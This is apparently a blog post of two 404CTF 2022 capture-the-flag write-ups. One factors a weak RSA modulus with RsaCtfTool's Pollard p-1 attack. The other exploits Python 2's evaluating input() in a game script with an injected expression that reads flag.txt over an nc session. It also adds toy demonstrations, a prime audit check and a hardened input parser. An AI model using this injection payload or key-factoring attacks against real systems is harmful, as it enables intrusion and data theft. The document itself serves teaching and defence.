Sunday, 11 September 2022

404CTF 2022 - Un RSA incassable? (An unbreakable RSA?)

Hello Agent,

We have learned that Hallebarde uses RSA encryption to communicate! We were able to intercept one of their messages, shown below, along with the public key used. According to our experts who looked at it before you, "The modulus is too big, there is nothing we can do". Can you see whether they missed something?

Modulus: 264260849184973464982616810011189432725471679851535970549752992980013685427054130834600835230399904802462965456974947538318213223585436360002292504595152950137188712696208597449140460215140901426523911789537180980494972189978839047835537352914856104135490608512555869141766081593589643441958443651294711541856201978508340915671607277979591968248058399795168563294090427290234733756922544755667413890558324220843460177193246018531280862561066074120654752753002311679435459237771670352371010596105395795940209523309781850979927988566194373203050532192192865140293356042897510103979797577385050030819647066037181
Exponent: 65537
Encrypted message: 40110232492214007673187408092050413824057587648366839143339482691859337096033351102276645395275735274322548715598894335826499267358923539936373981416212599523632227239475760261528220077888121552688286380591552417803111794635687206274867498165659330678667435332328065173075710535404048653621228158847748005294255562046654937629633514846123655978199420228460405580305729253303227936760801772396770804796700223239015341586701669475537453700175448572495847377417335800300005252499067811919833639526361733535793115856365357616339193637149185654816751038389408567777725988888990153670326115611236718811592564298263

 

Using the RsaCtfTool.py tool

[serge@alien1 RsaCtfTool]$ ./RsaCtfTool.py -n 264260849184973464982616810011189432725471679851535970549752992980013685427054130834600835230399904802462965456974947538318213223585436360002292504595152950137188712696208597449140460215140901426523911789537180980494972189978839047835537352914856104135490608512555869141766081593589643441958443651294711541856201978508340915671607277979591968248058399795168563294090427290234733756922544755667413890558324220843460177193246018531280862561066074120654752753002311679435459237771670352371010596105395795940209523309781850979927988566194373203050532192192865140293356042897510103979797577385050030819647066037181 -e 65537 --uncipher 40110232492214007673187408092050413824057587648366839143339482691859337096033351102276645395275735274322548715598894335826499267358923539936373981416212599523632227239475760261528220077888121552688286380591552417803111794635687206274867498165659330678667435332328065173075710535404048653621228158847748005294255562046654937629633514846123655978199420228460405580305729253303227936760801772396770804796700223239015341586701669475537453700175448572495847377417335800300005252499067811919833639526361733535793115856365357616339193637149185654816751038389408567777725988888990153670326115611236718811592564298263
private argument is not set, the private key will not be displayed, even if recovered.

[*] Testing key /tmp/tmp2g84j7ke.
[*] Performing factordb attack on /tmp/tmp2g84j7ke.
[*] Performing fibonacci_gcd attack on /tmp/tmp2g84j7ke.
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 9999/9999 [00:00<00:00, 57796.94it/s]
[*] Performing mersenne_primes attack on /tmp/tmp2g84j7ke.
29%|██████████████████████████████████████▊ | 15/51 [00:00<00:00, 351477.99it/s]
[*] Performing nonRSA attack on /tmp/tmp2g84j7ke.
[*] Performing pastctfprimes attack on /tmp/tmp2g84j7ke.
100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 113/113 [00:00<00:00, 395623.00it/s]
[*] Performing smallq attack on /tmp/tmp2g84j7ke.
[*] Performing system_primes_gcd attack on /tmp/tmp2g84j7ke.
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 7007/7007 [00:00<00:00, 623808.46it/s]
[*] Performing SQUFOF attack on /tmp/tmp2g84j7ke.
[!] Timeout.
[*] Performing boneh_durfee attack on /tmp/tmp2g84j7ke.
Can't load boneh_durfee because sage binary is not installed
[*] Performing comfact_cn attack on /tmp/tmp2g84j7ke.
[*] Performing cube_root attack on /tmp/tmp2g84j7ke.
[*] Performing ecm2 attack on /tmp/tmp2g84j7ke.
Can't load ecm2 because sage binary is not installed
[*] Performing fermat attack on /tmp/tmp2g84j7ke.
[!] Timeout.
[*] Performing fermat_numbers_gcd attack on /tmp/tmp2g84j7ke.
0%|▍ | 32/9999 [00:40<4:27:55, 1.61s/it][!] Timeout.
0%|▍ | 32/9999 [01:00<5:11:35, 1.88s/it]
[*] Performing mersenne_pm1_gcd attack on /tmp/tmp2g84j7ke.
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2019/2019 [00:00<00:00, 52186.48it/s]
[*] Performing noveltyprimes attack on /tmp/tmp2g84j7ke.
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 21/21 [00:00<00:00, 350917.86it/s]
[*] Performing nsif attack on /tmp/tmp2g84j7ke.
[!] This attack module is not implemented yet
[*] Performing partial_q attack on /tmp/tmp2g84j7ke.
[*] Performing pisano_period attack on /tmp/tmp2g84j7ke.
[*] Performing pollard_p_1 attack on /tmp/tmp2g84j7ke.
0%| | 0/997 [00:00<?, ?it/s]
[*] Attack success with pollard_p_1 method !

Results for /tmp/tmp2g84j7ke:

Unciphered data :
HEX : 0x3430344354467b4634317433355f347474337431306e355f347633635f6c335f5235347d
INT (big endian) : 101384582033510951325010359008727680625145975108923307577800692180149739885949739152509
INT (little endian) : 243229796752028152224492264058909156536767078577809619383880856732613058918122043748404
utf-8 : 404CTF{F41t35_4tt3t10n5_4v3c_l3_R54}
utf-16 : 〴䌴䙔䙻ㄴ㍴張琴㍴ㅴ渰張瘴挳江弳㕒紴
STR : b'404CTF{F41t35_4tt3t10n5_4v3c_l3_R54}'

 flag: 404CTF{F41t35_4tt3t10n5_4v3c_l3_R54}
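
Why the size of the modulus did not matter here, as an added example (not code from the original post or from RsaCtfTool): Pollard's p-1 method recovers a prime factor p whenever p-1 is built only from small primes, shown on small constructed moduli next to the key-generation check that flags such primes. The toy primes, the bounds and the function names are assumptions chosen for illustration.

```python
from math import gcd

def largest_prime_factor(m):
    """Largest prime factor of m by trial division (fine for these toy sizes)."""
    f, largest = 2, 1
    while f * f <= m:
        while m % f == 0:
            largest, m = f, m // f
        f += 1
    return max(largest, m) if m > 1 else largest

def pollard_p_minus_1(n, bound):
    """Return a non-trivial factor p of n when p-1 is bound-powersmooth, else None."""
    a = 2
    for q in range(2, bound + 1):
        if largest_prime_factor(q) != q:      # skip composites
            continue
        qe = q
        while qe * q <= bound:                # largest power of q not above bound
            qe *= q
        a = pow(a, qe, n)                     # a = 2^(product of prime powers so far) mod n
        g = gcd(a - 1, n)
        if g == n:                            # both factors hit at once: no split
            return None
        if g > 1:
            return g
    return None

def audit_prime(p, bound):
    """Key-generation check: True if p-1 has a prime factor larger than bound."""
    return largest_prime_factor(p - 1) > bound

# Constructed toy primes (not the challenge's): 2311-1 = 2*3*5*7*11 is smooth,
# while 2039 = 2*1019+1 and 2063 = 2*1031+1 are safe primes.
WEAK_N = 2311 * 2039
STRONG_N = 2039 * 2063

if __name__ == "__main__":
    print(pollard_p_minus_1(WEAK_N, 20))      # factor found with a tiny bound
    print(pollard_p_minus_1(STRONG_N, 1000))  # no factor at this bound
    print(audit_prime(2311, 1000), audit_prime(2039, 1000))
```
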

404CTF 2022 - python input injection

Python injection

Hallebarde has set up its own variant of rock-paper-scissors. To date, nobody in our services has managed to beat the computer. Show them what you are capable of by retrieving their precious flag.txt!

#!/usr/bin/python2.7 -u
# -*- coding: utf-8 -*-

choix = {1 : "pierre", 2 : "papier", 3 : "Hallebarde"}

def bonjour():
    print("Bienvenue sur pierre-papier-Hallebarde !")
    print("La pierre bat la Hallebarde, le papier bat la pierre et la Hallebarde bat le papier")
    print("Pour jouer entrez un chiffre entre 1 et 3 : ")
    print("1 : pierre")
    print("2 : papier")
    print("3 : Hallebarde")

def jouer():
    # Python 2: input() evaluates the typed line as a Python expression
    # (like eval(raw_input())) before int() ever sees the result.
    choix_utilisateur = int(input("Choix ?\n> "))

    # The computer always picks the move that beats the player's move.
    if choix_utilisateur == 1:
        choix_ordi = 2
    elif choix_utilisateur == 2:
        choix_ordi = 3
    elif choix_utilisateur == 3:
        choix_ordi = 1
    else:
        print("Choix invalide. Vous avez perdu")
        exit(1)

    print("Vous avez choisi : " + choix[choix_utilisateur] + ". L'ordinateur a choisi : " + choix[choix_ordi] +".")
    if decision(choix_utilisateur, choix_ordi) == 1:
        print("Vous avez gagné !!! Incroyable !")
        f = open("flag.txt", "r")
        print(f.readline())
        f.close()
    else:
        print("Vous avez perdu...")

def decision(joueur1, joueur2):
    # Returns 1 when joueur1 wins, 2 otherwise (draws included).
    if joueur1 == joueur2:
        return 2
    if joueur1 == 1 and joueur2 == 2:
        return 2
    if joueur1 == 1 and joueur2 == 3:
        return 1
    if joueur1 == 2 and joueur2 == 1:
        return 1
    if joueur1 == 2 and joueur2 == 3:
        return 2
    if joueur1 == 3 and joueur2 == 1:
        return 2
    if joueur1 == 3 and joueur2 == 2:
        return 1
    return 2

def main():
    bonjour()
    while True:
        jouer()


if __name__ == "__main__":
    main()

The injection:

nc challenge.404ctf.fr 30806
Bienvenue sur pierre-papier-Hallebarde !
La pierre bat la Hallebarde, le papier bat la pierre et la Hallebarde bat le papier
Pour jouer entrez un chiffre entre 1 et 3 : 
1 : pierre
2 : papier
3 : Hallebarde
Choix ?
> decision(choix.update({1:open("flag.txt", "r").readline()}),3)
Vous avez choisi : papier. L'ordinateur a choisi : Hallebarde.
Vous avez perdu...
Choix ?
> 1
Vous avez choisi : 404CTF{cH0iX_nUm3r0_4_v1c701r3}
. L'ordinateur a choisi : papier.
Vous avez perdu...
Choix ?

Flag: 404CTF{cH0iX_nUm3r0_4_v1c701r3}
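
The root cause and its fix side by side, as an added example (not part of the original post or the challenge code): Python 2's input() is simulated in Python 3 with eval(), and a strict parser that treats the line as data replaces it. The function names, the condensed decision() and the constructed MARKER payload, which stands in for the file read, are assumptions for illustration.

```python
choix = {1: "pierre", 2: "papier", 3: "Hallebarde"}

def decision(joueur1, joueur2):
    """Condensed copy of the challenge's decision(): 1 if joueur1 wins, else 2."""
    return 1 if (joueur1, joueur2) in {(1, 3), (2, 1), (3, 2)} else 2

def read_choice_py2_style(line, scope):
    """What int(input(...)) did under Python 2: evaluate the line as an expression."""
    return int(eval(line, scope))

def read_choice_safe(line):
    """Hardened form: the line is data only (raw_input() in Python 2, input() in Python 3)."""
    text = line.strip()
    if text not in ("1", "2", "3"):
        raise ValueError("invalid choice")
    return int(text)

def demo():
    table = dict(choix)                        # work on a copy of the game table
    scope = {"choix": table, "decision": decision}
    # Constructed payload with the same shape as the one in the session above.
    payload = 'decision(choix.update({1: "MARKER"}), 3)'
    # update() returns None, decision(None, 3) returns 2, so the "choice" is 2 (papier),
    # and the table entry for 1 has been overwritten as a side effect.
    got = read_choice_py2_style(payload, scope)
    try:
        read_choice_safe(payload)
        rejected = False
    except ValueError:
        rejected = True
    return got, table[1], rejected

if __name__ == "__main__":
    print(demo())
```

Under Python 2 the one-line fix in jouer() is to read the choice with raw_input() instead of input(); Python 3's input() already returns the typed text unevaluated.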